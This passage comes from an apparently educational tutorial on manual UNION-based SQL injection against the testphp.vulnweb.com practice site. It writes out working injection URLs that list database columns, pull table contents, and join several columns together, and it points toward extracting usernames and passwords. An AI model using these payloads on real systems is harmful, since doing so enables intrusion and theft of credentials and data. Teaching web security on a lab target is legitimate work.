http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.
columns+where+table_name=0x4556454e5453

We now know the columns of the table events

Extracting data from columns

We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS

The page didn't display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.
CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like 'USERS' and the columns have name 'USERNAME' and 'PASSWORD'. I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,
DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.